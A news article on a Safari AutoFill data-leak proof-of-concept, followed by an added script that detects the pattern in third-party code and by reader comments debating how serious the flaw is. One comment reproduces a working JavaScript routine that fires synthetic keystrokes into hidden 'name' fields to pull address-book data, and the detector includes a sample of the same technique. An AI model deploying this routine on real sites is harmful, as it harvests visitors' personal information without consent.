Security researcher demos autofill exploit in Apple Safari
The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered.
Jeremiah Grossman revealed on his blog this week that users who have the "AutoFill web forms" feature enabled on Safari versions 4 and 5 are vulnerable to malicious code. The AutoFill feature is enabled by default in Apple's Web browser.
The feature automatically fills online text forms that have specific, common names, such as "name," "company," "city," "state," "e-mail," and more. The information is automatically grabbed from the user's personal record included in the operating system's address book. That means the information could be obtained without the user even entering it into the Safari browser.
"All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript," Grossman wrote. "When data is populated, that is AutoFill'ed, it can be accessed and sent to the attacker."
He also created a proof-of-concept to show how it takes "mere seconds" to obtain the personal information. Grossman said the data could be used to send e-mail spam or conduct a phishing attack.
"Fortunately any AutoFill data starting with a number, such as phone numbers or street addresses, could not be obtained because for some reason the data would not populate in the text field," he said. "Still, such attacks could be easily and cheaply distributed on a mass scale using an advertising network where likely no one would ever notice because it's not exploit code designed to deliver rootkit payload."
Safari 5, the latest version of Apple's Web browser, was released in June. It added extensions and expanded HTML5 support for the desktop software.
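An added example, not taken from Grossman's post or this article: a heuristic that a publisher or ad network could run over third-party script source to flag the combination described above (text fields built at runtime, given AutoFill-triggering names, and fed fabricated input events). The signal names, the "email" spelling variant and both sample snippets are assumptions constructed for illustration.

```javascript
// Added example: heuristic scan of third-party script source for the
// AutoFill-harvesting pattern the article describes.
// Field names are the ones the article lists; "email" is an assumed variant.
const AUTOFILL_NAMES = ["name", "company", "city", "state", "e-mail", "email"];

// Signal names are hypothetical labels chosen for this example.
const SIGNALS = {
  // script builds inputs at runtime instead of shipping them in markup
  dynamicInput: /createElement\(\s*['"]input['"]\s*\)/i,
  // script fabricates text/keyboard events rather than waiting for the user
  syntheticEvent: /createEvent\(\s*['"](TextEvent|KeyboardEvent|KeyEvents?)['"]\s*\)|new\s+KeyboardEvent\(/i,
  // the fabricated event is actually delivered to an element
  dispatch: /\.dispatchEvent\(/,
  // field values are read back by the script (not merely assigned)
  readBack: /\.value\b(?!\s*=[^=])/,
};

// Collect AutoFill-triggering names the script assigns to elements.
function autofillNamesAssigned(src) {
  const found = new Set();
  const re = /\.name\s*=\s*['"]([^'"]+)['"]|setAttribute\(\s*['"]name['"]\s*,\s*['"]([^'"]+)['"]/gi;
  for (const m of src.matchAll(re)) {
    const n = (m[1] || m[2]).toLowerCase();
    if (AUTOFILL_NAMES.includes(n)) found.add(n);
  }
  return [...found];
}

function scanScript(src) {
  const hits = Object.keys(SIGNALS).filter((k) => SIGNALS[k].test(src));
  const names = autofillNamesAssigned(src);
  // Flag only the combination: runtime-built field + AutoFill name + delivered synthetic input.
  const suspicious = names.length > 0 &&
    ["dynamicInput", "syntheticEvent", "dispatch"].every((k) => hits.includes(k));
  return { suspicious, names, hits };
}

// Constructed samples (not captured traffic).
const SAMPLE_FLAGGED = `
  var el = document.createElement('input'); el.type = 'text'; el.name = 'name';
  var ev = document.createEvent('TextEvent'); ev.initTextEvent('textInput', true, true, null, 'A');
  el.focus(); el.dispatchEvent(ev);
  setTimeout(function () { report(el.value); }, 500);`;
const SAMPLE_BENIGN = `
  var el = document.createElement('input'); el.name = 'email';
  el.addEventListener('change', function () { validate(el.value); });`;

console.log(scanScript(SAMPLE_FLAGGED));
console.log(scanScript(SAMPLE_BENIGN));
```

A pattern match like this is a triage signal for manual review of a creative, not proof of harvesting; obfuscated or dynamically assembled script will not match.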
Comments
Yikes that is a bad one. I unchecked it right now.
It would take about 30 seconds or so to find out your name, email, address, which means a video site or a long article site would be the best place for this to work.
I will be interested to hear the Apple response to this. I find it almost too obvious to be plausible. What malicious code has been proven to access this so far? I did disable it though.
Yep. Javascript and Ajax, the savior of the web.
I just tested the fields that have numbers. When you start the phone with a "(" it does give you a drop down list presumably using Javascript. So if you could figure out the innerHTML being used, one might be able to get that info as well. Same thing with the address field. You get a drop down select list.
I have to do some more testing. I'm curious whether SSL prevents it, but signed certificates would at least be more trustworthy.
The autofill feature found in Apple's Safari Web browser could be used by a hacker to illegally obtain a user's personal information, including their name and e-mail address, a security researcher has discovered. ...
I don't get why this is being viewed as any kind of real issue, or why some web sites are saying that this could potentially compromise passwords and credit card info as well. It seems quite obvious that it cannot.
*IF* you have autofill turned on (and any security conscious person would not do so), and
*IF* you go to a malicious web site,
That web site can get your name and address. Wow.
I'm shakin in my boots right now. My address? Freely available to complete strangers? This is almost as bad as ...
... the phone book in every public telephone in my home town.
function start() {
    var str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    var charset = str.split("");
    var d = document.getElementById('data');
    var f = [];
    var i = [];
    //var char = charset.shift();
    for (var xx = 0; xx < 26; xx++) {
        f[xx] = document.createElement('form');
        f[xx].id = 'form' + xx;
        i[xx] = document.createElement('input');
        i[xx].type = "text";
        i[xx].name = 'name';
        i[xx].id = "iname" + xx;
        f[xx].appendChild(i[xx]);
        document.getElementById('hack').appendChild(f[xx]);
        var event = document.createEvent('TextEvent');
        event.initTextEvent('textInput', true, true, null, charset[xx]);

        i[xx].value = "";
        i[xx].selectionStart = 0;
        i[xx].selectionEnd = 0;
        i[xx].focus();
        i[xx].dispatchEvent(event);
    }

    setTimeout(function() {
        for (var xx = 0; xx < 26; xx++) {
            var i = document.getElementById('iname' + xx);
            if (i.value.length > 1) {
                d.innerHTML += i.value + "<br>\n";
            }
        }
    }, 500);
}
I don't get why this is being viewed as any kind of real issue, or why some web sites are saying that this could potentially compromise passwords and credit card info as well. It seems quite obvious that it cannot.
*IF* you have autofill turned on (and any security conscious person would not do so), and
*IF* you go to a malicious web site,
That web site can get your name and address. Wow.
I'm shakin in my boots right now. My address? Freely available to complete strangers? This is almost as bad as ...
... the phone book in every public telephone in my home town.
If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting. Nevertheless, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.
If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting. Nevertheless, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.
Agreed that it's a security flaw.
It's just a small, weird, kind of silly security flaw IMO.
But all over the web today there are scary stories about this "awful" "dangerous" flaw. Ars is actually running with a headline that says "Apple the new world leader in software insecurity." Which is absolutely ridiculous in its implications.
As with Antennagate, the media is having fun making it seem like Apple is evil incarnate etc.
I think we'll see a quick security patch here. I guess a LOT of people are using Auto Fill..
It does take a little bit to get it configured, but guess what, ssshhhhh ... <whispering>NoScript can also kill all the 3rd party analytic Javascript running on your browsing sessions.
If you can't get click-jacked, almost all the web malware gets cut out except for the crap like giving out your password to load video codecs...
If you started getting solicited with emails personally addressed to you and telemarketing on your cell phone where they address you by name (assuming it might be possible to get numbers), it might become a bit disconcerting.
It is many years since I get unsolicited telemarketing on my home phone line, personally addressed to me. It is very annoying and has obviously nothing to do with such vulnerabilities in web browsers. Companies have other and more sure means to collect personal information, with the most obvious being the telephone directory. That one is not going to disappear auto-magically after a security update.
Nevertheless, the personal info is being harvested without your knowledge. It is not like you volunteered the information, so yes it IS a security flaw.
Here I agree but I don't see much potential for harm. Hopefully it will be trivial for Apple to close the hole.